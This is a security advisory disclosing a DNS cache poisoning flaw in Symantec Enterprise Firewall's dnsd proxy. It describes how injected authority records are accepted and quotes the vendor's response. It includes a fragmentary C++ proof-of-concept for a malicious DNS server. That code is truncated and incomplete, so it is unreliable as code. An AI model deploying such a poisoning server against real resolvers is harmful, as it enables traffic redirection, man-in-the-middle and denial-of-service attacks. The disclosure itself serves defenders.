Symantec Enterprise Firewall, designed to provide proactive, enterprise-class network and application-level protection, enables fast and secure connectivity with the Internet.
Symantec Enterprise Firewall dnsd proxy is vulnerable to cache poisoning attacks by an attacker acting as a caching nameserver.
Credit:
The information has been provided by fryxar.
It is possible to inject false entries in the server's cache and make a false DNS server look like authoritative of a zone, when it is not. Once this information is loaded to the cache, any request to a subdomain of that zone will be submitted to the false DNS. To achieve that, a malicious DNS server responds to a query, but not necessarily with an answer, fills in the authoritative and additional records section of the DNS response message with information that did not necessarily relate to the answer. As we can see, DNSD SEF proxy accepts this response and does not perform any necessary checks to assure that the this information is correct or even related in some way to the answer (i.e., that the responding server had appropriate authority over those records).
fryxar has found that some public DNS servers use this vulnerability to redirect unregistered domains to their sites. It also could be used to do Man-In-The-Middle / Denial of Services / Social Engineering Attacks.
Vendor Status:
Symantec's response as follows:
"Symantec engineers are reviewing the posted information. If it is validated we will respond accordingly."
Proof of Concept Code:
Solaris 9 / SEF 8 and SEF 7.0.4: In an authoritative nameserver (e.g. afraid.org dynamic DNS that supports domain NS delegation), compile and run the following small DNS server:
// PoC poisoning cache attack SEF 8 and later (by fryxar)
// Requires poslib 1.0.4 library
// Compile: g++ `poslib-config --libs --cflags --server` poc.cpp -o poc
/* bring up posadis */
servers.push_front(ServerSocket(ss_udp, udpcreateserver(&a)));
// use the posadis logging system
pos_log(context_none, log_info, "Proof of concept DNS server starting
up...");
// set signal handlers
signal(SIGINT, cleanup);
signal(SIGTERM, cleanup);
// set query function
handle_query = my_handle_query;
// run server
posserver_run();
} catch (PException p) {
printf("Fatal exception: %s\n", p.message);
return 1;
}
return 0;
}
/* the entry function which will handle all queries */
DnsMessage *my_handle_query(pending_query *query) {
DnsMessage *a = new DnsMessage();
DnsQuestion q;
DnsRR rr;
/* set a as an answer to the query */
a->ID = query->message->ID;
a->RD = query->message->RD;
a->RA = false;
if (query->message->questions.begin() ==
query->message->questions.end()) {
/* query did not contain question */
a->RCODE = RCODE_QUERYERR;
return a;
}
q = *query->message->questions.begin();
a->questions.push_back(q);
a->QR = true;
And now SEF "thinks" that fakedns.com server is an authoritative nameserver of the ".org" domain, controlled by fryxar.afraid.org DNS server that is only authoritative for the fryxar.afraid.org domain.
